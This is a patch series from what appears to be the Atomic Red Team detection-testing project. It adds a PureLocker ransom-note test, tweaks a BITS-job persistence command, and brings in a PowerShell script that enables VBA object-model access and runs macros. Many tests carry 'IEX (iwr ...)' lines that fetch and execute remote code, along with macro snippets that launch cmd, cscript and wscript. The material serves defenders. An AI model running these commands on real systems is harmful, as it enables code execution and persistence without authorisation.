diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index ffb97ef0..12ae449e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -770,7 +770,8 @@
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
 - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
-- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+ - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 44c424f0..5cb56258 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -5,7 +5,7 @@ | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object 
Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e789dbe4..c4351d9f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47406,6 +47406,21 @@ impact: cleanup_command: | $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path} rm #{encrypted_file_path} + - name: PureLocker Ransom Note + auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528 + description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware + \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n" + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt + +' + cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 + +' T1565: technique: external_references: diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index 293063cb..afe77350 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md 
@@ -16,6 +16,8 @@ In cloud environments, storage objects within compromised accounts may also be e - [Atomic Test #4 - Encrypt files using openssl (Linux)](#atomic-test-4---encrypt-files-using-openssl-linux) +- [Atomic Test #5 - PureLocker Ransom Note](#atomic-test-5---purelocker-ransom-note) +
@@ -230,4 +232,37 @@ which_openssl=`which openssl` +
+
+ +## Atomic Test #5 - PureLocker Ransom Note +building the IOC (YOUR_FILES.txt) for the PureLocker ransomware +https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 649349c7-9abf-493b-a7a2-b1aa4d141528 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt +``` + +#### Cleanup Commands: +```cmd +del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 +``` + + + + +
From e4f7f6720246d72cb3b14f6c470486ccfd579f7e Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Mon, 28 Jun 2021 12:28:26 -0600 Subject: [PATCH 80/84] Update T1197.yaml (#1535) * Update T1197.yaml Resolving #1459 * Update T1197.yaml * Update T1197.yaml --- atomics/T1197/T1197.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index c7317d0b..6b16915c 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -77,7 +77,7 @@ atomic_tests: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} From 988716bc19047bd44abebc47580aca1b5837c6f0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Jun 2021 18:28:53 +0000 Subject: [PATCH 81/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1197/T1197.md | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c4351d9f..3afb17fe 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -19113,7 +19113,7 @@ defense-evasion: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} 
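Review bot: The switch from `""` to `NULL` as the program-parameters argument of `bitsadmin.exe /setnotifycmdline` is not explained in the test itself, and the commit message only points at #1459, so a later editor could plausibly "tidy" it back to an empty string. Suggest recording the rationale in the test's `description` (outside this hunk), along the lines of `NULL is the placeholder bitsadmin expects when the notify command takes no parameters` — hedged, since the underlying failure that prompted the change is not visible here. The enclosing test definition starts before this hunk.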
@@ -37879,7 +37879,7 @@ persistence: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index f5068754..634b81f0 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -131,7 +131,7 @@ This job will remain in the BITS queue until complete or for up to 90 days by de ```cmd bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} -bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" +bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} From 78f6d1988f5affbcbdeba9631b56eb1084131bb5 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Tue, 29 Jun 2021 10:15:51 -0700 Subject: [PATCH 82/84] Add "Request Invite" next to Slack Link (#1538) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a1258851..0a0bc26d 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ See: https://atomicredteam.io ## Having trouble? -Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) +Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)) ## Getting Started From c0e5117730610fd7cdf254c9f386a5ab6931790c Mon Sep 17 00:00:00 2001 
From: Carrie Roberts Date: Thu, 1 Jul 2021 20:11:10 -0600 Subject: [PATCH 83/84] moving invoke-maldoc into art repo --- atomics/T1053.005/T1053.005.yaml | 2 +- atomics/T1055.012/T1055.012.yaml | 2 +- atomics/T1055/T1055.yaml | 2 +- atomics/T1059.005/T1059.005.yaml | 4 +- atomics/T1070.001/T1070.001.yaml | 2 +- atomics/T1115/T1115.yaml | 2 +- atomics/T1204.002/T1204.002.yaml | 10 +-- atomics/T1204.002/src/Invoke-MalDoc.ps1 | 100 ++++++++++++++++++++++++ atomics/T1555/T1555.yaml | 2 +- atomics/T1564/T1564.yaml | 2 +- atomics/T1566.001/T1566.001.yaml | 2 +- 11 files changed, 115 insertions(+), 15 deletions(-) create mode 100644 atomics/T1204.002/src/Invoke-MalDoc.ps1 diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 204e3985..59a7b460 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -128,7 +128,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell - name: WMI Invoke-CimMethod Scheduled Task diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index f73de2eb..742cd901 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml 
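Review bot: The updated `IEX (iwr ...)` line still downloads Invoke-MalDoc.ps1 from the `master` branch over the network and executes whatever is served at run time, even though this same commit vendors the script at atomics/T1204.002/src/Invoke-MalDoc.ps1 (see the `create mode 100644` in the diffstat). Since every other path in these tests already resolves through `PathToAtomicsFolder`, the local copy could be dot-sourced instead, e.g. `. "PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1"`, which removes the unpinned remote-code dependency and lets the test run offline; if a remote fetch is deliberately wanted, referencing a commit SHA rather than `master` would at least tie the executed script to a reviewed revision. The same line is changed identically in the T1055.012, T1055, T1059.005 (two hunks), T1070.001, T1115, T1204.002 (five hunks), T1555, T1564 and T1566.001 hunks that follow. The `command` block scalars these lines sit in start before each hunk.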
@@ -60,6 +60,6 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" name: powershell diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 83d13c9b..cfb0bf62 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -27,7 +27,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell - name: Remote Process Injection in LSASS via mimikatz diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index 61f9bc20..3425d472 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml 
@@ -55,7 +55,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: | Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null @@ -90,7 +90,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 019d9ef3..fdd29975 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml 
@@ -55,7 +55,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell elevation_required: true diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 6ef34667..12bcbf94 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -64,7 +64,7 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" cleanup_command: | Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 8c749447..a39afdda 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml 
@@ -37,7 +37,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: | @@ -93,7 +93,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell @@ -129,7 +129,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell 
@@ -164,7 +164,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} name: powershell @@ -290,7 +290,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell diff --git a/atomics/T1204.002/src/Invoke-MalDoc.ps1 b/atomics/T1204.002/src/Invoke-MalDoc.ps1 new file mode 100644 index 00000000..b567ad56 --- /dev/null +++ b/atomics/T1204.002/src/Invoke-MalDoc.ps1 
@@ -0,0 +1,100 @@ +function Invoke-MalDoc { + <# + .SYNOPSIS + A module to programatically execute Microsoft Word and Exel Documents containing macros. + + .DESCRIPTION + A module to programatically execute Microsoft Word and Exel Documents containing macros. The module will temporarily add a registry key to allow PowerShell to interact with VBA. + .PARAMETER macroCode + [Required] The VBA code to be executed. By default, this macro code will be wrapped in a sub routine, called "Test" by default. If you don't want your macro code to be wrapped in a subroutine use the `-noWrap` flag. To specify the subroutine name use the `-sub` parameter. + .PARAMETER macroFile + [Required] A file containing the VBA code to be executed. To specify the subroutine name to be called use the `-sub` parameter. + .PARAMETER officeVersion + [Optional] The Microsoft Office version to use for executing the document. e.g. "16.0". The version will be determined Programmatically if not specified. + .PARAMETER officeProduct + [Required] The Microsoft Office application in which to create and execute the macro, either "Word" or "Excel". + .PARAMETER sub + [Optional] The name of the subroutine in the macro code to call for execution. Also the name of the subroutine to wrap the supplied `macroCode` in if `noWrap` is not specified. + .PARAMETER noWrap + [Optional] A switch that specifies that the supplied `macroCode` should be used as-is and not wrapped in a subroutine. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Word" + ----------- + Create a macro enabled Microsoft Word Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "Test" and then executed. + + .EXAMPLE + C:\PS> $macroCode = Get-Content path/to/macro.txt -Raw + C:\PS> Invoke-Maldoc -macroCode $macroCode -officeProduct "Word" + ----------- + Create a macro enabled Microsoft Word Document. 
The macro code read from `path/to/macro.txt` will be wrapped inside of a subroutine call "Test" and then executed. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Excel" -sub "DoIt" + ----------- + Create a macro enabled Microsoft Excel Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "DoIt" and then executed. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroCode "Sub Exec()`nMsgBox `"Hello`"`nEnd Sub" -officeProduct "Word" -noWrap -sub "Exec" + ----------- + Create a macro enabled Microsoft Word Document. The macroCode will be unmodified (i.e. not wrapped insided a subroutine) and the "Exec" subroutine will be executed. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroFile "C:\AtomicRedTeam\atomics\T1003\src\macro.txt" -officeProduct "Word" -sub "DoIt" + ----------- + Create a macro enabled Microsoft Word Document. The macroCode will be read from the specified file and the "DoIt" subroutine will be executed. + +#> + + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "code")] + [String]$macroCode, + + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "file")] + [String]$macroFile, + + [Parameter(Position = 1, Mandatory = $False)] + [String]$officeVersion, + + [Parameter(Position = 2, Mandatory = $True)] + [ValidateSet("Word", "Excel")] + [String]$officeProduct, + + [Parameter(Position = 3, Mandatory = $false)] + [String]$sub = "Test", + + [Parameter(Position = 4, Mandatory = $false, ParameterSetName = "code")] + [switch]$noWrap + ) + + $app = New-Object -ComObject "$officeProduct.Application" + if (-not $officeVersion) { $officeVersion = $app.Version } + $Key = "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" + if (-not (Test-Path $key)) { New-Item $Key } + Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1 + + if ($macroFile) { + $macroCode = Get-Content $macroFile -Raw + } + elseif (-not $noWrap) { + $macroCode = "Sub $sub()`n" + $macroCode + 
